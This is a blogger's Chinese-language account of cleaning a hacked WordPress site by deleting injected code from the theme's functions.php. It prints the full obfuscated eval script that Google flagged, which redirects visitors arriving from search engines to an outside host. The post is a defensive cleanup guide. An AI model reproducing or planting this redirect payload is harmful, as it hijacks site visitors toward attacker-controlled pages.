我有個用 WordPress 搭建的 CMS 網站前些日子被瀏覽器報受攻擊了,谷歌的網站管理也工具也提示,還給出了可疑代碼和受影響的文章的地址,以
前被攻擊的經歷,那次與這次不同,只是掛了幾個黑鏈,這次不同,因此只能手動找代碼清除了,剛開始網上搜了搜相關事例,有些博主是在數據庫裏清除的,但我
的行不通,因為我的問題不在數據庫,而在 functions.php 文件。

清除 WordPress 掛馬代碼:

1. 先是登陸谷歌網站管理工具,在 「故障診斷」 下選擇 「惡意軟件」 進入存在問題的網址,隨便點擊一個有問題的網站,谷歌網站管理員工具就會給出 「可疑的植入代碼」

<script
language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return

r[e]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c]);return p}('e
r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&(q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>

注:不要在瀏覽器中執行!

2. 在被掛馬博客當前主題的 functions.php 文件中的,找到與谷歌網站管理員工具給出的可疑的植入代碼相同的代碼,然後把整個 php 語句刪除掉,我找到的整句代碼如下:(藍色部分)

3. 然後保存文件。

注:不能確定的博主,可以拿出當前主題的備份主題的 functions.php 文件替換掉原來的。此外刪除掉後,在谷歌網站管理員工具中申請審核,否則 chrome 瀏覽器還會報警告。

PS:我對掛馬和代碼這些瞭解不是很清楚,只是參照谷歌網站管理工具給出的相應的可疑植入代碼進行清理,合理性有待考察。